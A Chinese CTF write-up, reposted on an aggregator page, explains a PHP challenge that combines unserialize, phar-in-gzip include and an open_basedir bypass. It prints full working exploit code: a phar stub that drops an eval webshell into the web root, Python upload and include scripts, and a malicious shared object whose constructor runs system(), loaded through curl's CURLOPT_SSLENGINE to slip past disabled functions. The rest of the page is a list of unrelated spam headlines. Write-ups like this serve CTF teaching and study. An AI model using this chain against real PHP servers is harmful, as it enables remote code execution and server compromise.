当前位置：首页 > news >正文

法尔plus wp

news 2026/3/27 9:04:42

考点是phar rce + 最新版绕过open_basedir的方法

<?php
highlight_file(__FILE__);function waf($data){if (is_array($data)){die("nonono arrays");}if (preg_match('/<\?|__HALT_COMPILER|get|Coral|Nimbus|Zephyr|Acheron|ctor|payload|php|filter|base64|rot13|read|data/i', $data)) {die("You can't do");}
}class ddd{public $pivot;public function __set($k, $value) {$k = $this->pivot->ctor;echo new $k($value);}
}class ccc{public $handle;public $ctor;public function __destruct() {return $this->handle();}public function __call($name, $arg){$arg[1] = $this->handle->$name;}
}class bbb{public $target;public $payload;public function __get($prop){$this->target->$prop = $this->payload;}
}class aaa {public $mode;public function __destruct(){$data = $_POST[0];if ($this->mode == 'w') {waf($data);echo $data;$filename = "/var/www/html/".md5(rand()).".phar";file_put_contents($filename, $data);echo $filename;} else if ($this->mode == 'r') {waf($data);$f = include($data);if($f){echo "yesyesyes";}else{echo "You can look at the others";}}}
}if(strlen($_POST[1]) < 52) {$a = unserialize($_POST[1]);
}
else{echo "too long!!";
}?>

include邂逅phar
看这篇文章讲了底层逻辑
当include邂逅phar——DeadsecCTF2025 baby-web – fushulingのblog
最后的结论就是，比如我们生成了一个phar文件，然后把他打包成gz文件，当我们include这个gz文件时，php会默认把这个gz文件解压回phar进行解析
那么我们只要包含关键字就能直接rce
可是这里我把open_basedir还有一些system的指令全都ban掉了基本上是不可能命令执行成功的考点就算最新版本的绕过方法之前有些我们这里写个马进去

<?php class TEST{ } $a=new TEST(); @unlink("shell.phar"); $phar = new Phar("shell.phar"); $phar->startBuffering(); $phar->setMetadata($a); $stub="<?php \$content = '<?php @eval(\$_POST[\"cmd\"]); ?>'; file_put_contents('/var/www/html/4.php', \$content);__HALT_COMPILER(); ?>"; $phar -> setStub($stub); $phar->addFromString("1.txt", "6666"); $phar->stopBuffering(); ?>

然后gz压缩

gzip -c shell.phar > shell.phar.gz

接下来就算传文件上去这里用python

import requests
url='http://172.18.131.0:8888/1.php'
with open('shell.phar2.gz','rb') as file:f=file.read()
data={"0":f,"1":"O:3:\"aaa\":1:{s:4:\"mode\";s:1:\"w\";}"}
response=requests.post(url=url,data=data)
print(response.text)

再去做包含

import requests
url='http://172.18.131.0:8888/1.php'
bbb='/var/www/html/a388df223ff2ac5e539a896f5dc0be79.phar'
data={"0":bbb,"1":"O:3:\"aaa\":1:{s:4:\"mode\";s:1:\"r\";}"}
response=requests.post(url=url,data=data)
print(response.text)

成功写入木马
怕他家觉得自己的马传上去没用，我还贴心的给了phpinfo
发现禁用sqlite3那么就用curl
所以我们需要编写一个恶意的 so 文件：

#include <stdlib.h>__attribute__((constructor))
static void rce_init(void){system("env >/tmp/pro");
}

编译成 so ：

g++ -fPIC -shared -o evil.so 1.cpp

然后通过加载 so 来rce:

$ch = curl_init();
curl_setopt($ch, CURLOPT_SSLENGINE,"/tmp/evil.so");
$data = curl_exec($ch);

最后一点感想，很荣幸刚加入V&N就能参与这一次出题，收获了很多，题目不是很难，师傅们应该也打得很尽心，希望能和V&N一起进步

查看全文

http://www.jsqmd.com/news/68208/

2025郑州拿证快/可换教练驾校排名：附近靠谱驾校推荐与全解

2025年度净化板服务商TOP5权威推荐，甄选企业助力洁净工

2025折弯机无压痕模选购参考榜

.NET 8以上版本，字节数组转字符串

2025 家装衣柜选购指南：6 大品牌推荐，环保收纳与美学兼具

2025年市面上优秀的微动开关公司口碑推荐榜，新能源微动开关/大电流微动开关/防水微动开关/微动开关/汽车微动开关定做厂家哪家权威

2025年瑞士马格MAAG齿轮泵NP28/28代理商权威推荐榜单：MAAG齿轮泵NP45/45‌/MAAG齿轮泵‌/瑞士马格MAAG齿轮泵‌‌源头代理商精选

涿鹿县自建房找谁好？河北张家口涿鹿县自建房公司 / 机构深度评测口碑推荐榜

数据安全交换平台有哪些？一文读懂主流类型优劣势

2025 年 12 月高空特种作业服务商权威推荐榜：幕墙吊装/拆卸，塔吊高空拆卸/解体/事故救援，安全高效解决方案深度解析

在河北省邢台市襄都区老家农村盖房子，靠谱的自建房公司口碑推荐。河北省邢台市襄都区自建房公司/机构权威测评推荐排行榜

2025年12月螺丝厂家推荐：紧固件行业头部企业对比评价报告

2025年机械/空调/航空用温度传感器五大推荐公司，工业测温

2025年12月广东紧固件厂家推荐：核心厂商对比评测与选型建议

2025年宁波口碑不错的食堂承包公司推荐，诚信的工厂食堂承包

Ubuntu 24.04 LTS 系统安装搜狗输入法问题总结

2025年12月螺丝厂家推荐：制造业供应链优选品牌综合评测榜单

2025年值得推荐的竹制品供应商TOP5：口碑好的竹制品厂家

2025年口碑好的工业网桥转换器厂家推荐：工业网桥转换器个性

2025年双羽电阻认证厂家/实力厂家/定制生产企业十大排行榜

门头沟区农村自建房找谁好？北京市门头沟区自建房公司/机构深度评测口碑推荐榜。

2025年12月广东紧固件厂家推荐：市场口碑评价与服务质量解读

2025年上海评价高、售后完善、诚信装修装饰品牌及设计公司排

2025年昆明AI搜索获客平台TOP5推荐：AI搜索快速获客

2025年昆明AI搜索引流获客公司TOP5推荐：低成本稳定获

相关文章：